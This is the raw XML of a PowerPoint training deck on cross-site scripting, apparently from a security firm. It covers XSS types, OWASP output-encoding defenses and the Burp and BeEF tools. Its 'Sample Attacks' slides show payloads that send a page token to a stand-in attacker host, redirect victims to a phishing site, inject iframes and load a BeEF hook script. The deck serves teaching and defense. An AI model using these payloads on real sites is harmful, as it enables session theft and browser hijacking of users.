                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>('token').</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>innerHTML;new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> = 'http://attacker/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=' + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>;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8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Sample Attacks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 fontScale="85000" lnSpcReduction="20000"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Site defacement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Insert image tags or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>iframes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRP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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>="https://illicit_content" /&gt;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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=https://embedded_site/&gt;&lt;/iframe&gt;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Redirect victim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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>window.location.href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>="http://phishing_site"&lt;/script&gt;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Metasploit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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=http://metasploit/&gt;&lt;/iframe&gt;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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Hook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&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>="http://beef_server:3000/hook.js"&gt;&lt;/script&gt;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/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Demo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Hooked client data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Cookie theft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Redirection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iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> injection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Persistence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Key logging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6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/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Demo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" y="1128484"/>
            <a:ext cx="3763972" cy="2964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536" y="1041399"/>
            <a:ext cx="3974602" cy="32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1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/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Demo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2" y="1219492"/>
            <a:ext cx="3681410" cy="33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/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> Demo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48" y="1067933"/>
            <a:ext cx="2040923" cy="3551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2" y="1120836"/>
            <a:ext cx="1888391" cy="34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Summary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XSS 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vulns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> are located by looking for unencoded output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attacks execute on the client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properly addressed by encoding output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is occasionally addressed by whitelisting input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is more than just message boxes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28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4" y="1894102"/>
            <a:ext cx="3034952" cy="96890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3079660"/>
            <a:ext cx="9143999" cy="198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4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>www.directdefense.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4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31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Mutillidae</a:t>
            </a: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Burp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Firefox</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>BeEF</a:t>
            </a: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Metasploit</a:t>
            </a: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7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Overview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Also called XSS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2017 OWASP Top </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Ten - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>A7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Injection Attack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Results from improperly encoded output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Attacks clients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Write JavaScript and have victim browser run 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Defenses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281940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u="sng" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Properly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> encode data!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OWASP lists 8 protection rules, 4 bonus rules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OWASP ESAPI encoders or framework encoders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HTML-encode element content ("&lt;&gt;’&amp;/)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&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>&lt;/div&gt;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ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>encodeForHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>()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6790" y="4783059"/>
            <a:ext cx="461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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399453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Defenses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3101340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"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HTML attributes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Encode non-Alphanumeric ASCII as &amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> format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&lt;div attribute=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>”&gt;&lt;/div&gt;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ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>encodeForHTMLAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p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Encode for JS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Use \</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> escape format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Not always possible to safely escape (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>window.setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>)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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>testvar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>’;&lt;/script&gt;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ESAPI.encoder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>encodeForJavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>()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6790" y="4783059"/>
            <a:ext cx="461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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="149619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Defenses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310134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CSS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Escape with \HH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&lt;style&gt;selector { property : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>; } &lt;/style&gt;     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b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>NEVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> safe on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>background-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>text-size</a:t>
            </a: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6790" y="4783059"/>
            <a:ext cx="461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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254703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Defenses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310134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 err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック"/>
            </a:endParaRP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Escape with %HH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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=“http://site/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>”&gt;link text&lt;/a&gt;     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b="1" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>NEVER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t> safe for entire user-provided URL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>CONTENT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>”&gt;link text&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1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6790" y="4783059"/>
            <a:ext cx="461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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380724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Cross-site Scripting Defenses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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72" y="1504950"/>
            <a:ext cx="7885728" cy="3101340"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr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HTML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Cannot encode if users MUST be able to provide HTML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Have to whitelist HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック"/>
              </a:rPr>
              <a:t>Use sanitization library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" b="1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  <a:p>
            <a:pPr>
              <a:buFont typeface="Tahoma" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:ea typeface="ＭＳ Ｐゴシック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17487-CC6B-EF42-81A0-9C23607733F5}" type="datetime4">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>April 26, 2018</a:t>
            </a:fld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764" y="4783059"/>
            <a:ext cx="329636" cy="182880"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{515BA0A7-2D4D-5E44-9E8B-6DFF6FD288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6790" y="4783059"/>
            <a:ext cx="4617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https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="376929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964D6747-99AB-4E4B-80EC-816BBFF0284D}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Custom Design">
  <a:themeElements>
    <a:clrScheme name="DirectDefense">
      <a:dk1>
        <a:srgbClr val="232121"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="666B6D"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="D2D2D1"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="232121"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="D2D2D1"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="666B6D"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00ACE4"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FD5D1A"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="9CD3EC"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="00ACE4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576_DD_PPT_Template_R1_LB-MP" id="{A26E19FC-6F2F-254D-8835-1B26796CA5D7}" vid="{B5DDCC67-D501-DE47-8B3D-166CB0B29D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B63D44CCE4914BB34183B062CF6FE1" ma:contentTypeVersion="4" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="372159b7c420614f5a61c5a69b0e8b03">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="3731b75e-6f68-40f4-9d0a-0a5cf2200f93" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="d64b5b83b0766b47035683cfca990c54" ns2:_="">
    <xsd:import namespace="3731b75e-6f68-40f4-9d0a-0a5cf2200f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b75e-6f68-40f4-9d0a-0a5cf2200f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BB757E-0932-4635-8D18-732DEBB5D1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B99817-A09C-4D50-BB92-742174BE1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b75e-6f68-40f4-9d0a-0a5cf2200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09629B-DAAE-43CD-9923-A162774A43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4576_DD_PPT_Template_R1_LB-c</Template>
  <TotalTime>12210</TotalTime>
  <Words>1677</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>376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.AppleSystemUIFont</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Regular</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defense and Attacks </vt:lpstr>
      <vt:lpstr>Objective </vt:lpstr>
      <vt:lpstr>Tools </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Overview </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Defenses </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Bonus Rules</vt:lpstr>
      <vt:lpstr>Injection Points </vt:lpstr>
      <vt:lpstr>Burp Example </vt:lpstr>
      <vt:lpstr>Cross-site Scripting Types </vt:lpstr>
      <vt:lpstr>Reflected XSS Example </vt:lpstr>
      <vt:lpstr>Reflected XSS Example </vt:lpstr>
      <vt:lpstr>Stored XSS Example </vt:lpstr>
      <vt:lpstr>Stored XSS Example </vt:lpstr>
      <vt:lpstr>DOM-based XSS Example </vt:lpstr>
      <vt:lpstr>DOM-based XSS Example </vt:lpstr>
      <vt:lpstr>Sample Attacks </vt:lpstr>
      <vt:lpstr>Sample Attacks </vt:lpstr>
      <vt:lpstr>BeEF Demo </vt:lpstr>
      <vt:lpstr>BeEF Demo </vt:lpstr>
      <vt:lpstr>BeEF Demo </vt:lpstr>
      <vt:lpstr>BeEF Demo </vt:lpstr>
      <vt:lpstr>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COPY LOREM IPSUM DOLOR SIT AMET</dc:title>
  <dc:creator>Jared Lemos</dc:creator>
  <cp:lastModifiedBy>Stephen Deck</cp:lastModifiedBy>
  <cp:revision>50</cp:revision>
  <cp:lastPrinted>2017-10-21T20:35:35Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-05-08T14:15:54Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-26T16:50:32Z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0x01010009B63D44CCE4914BB34183B062CF6FE1</vt:lpwstr>
  </property>
</Properties>
</file>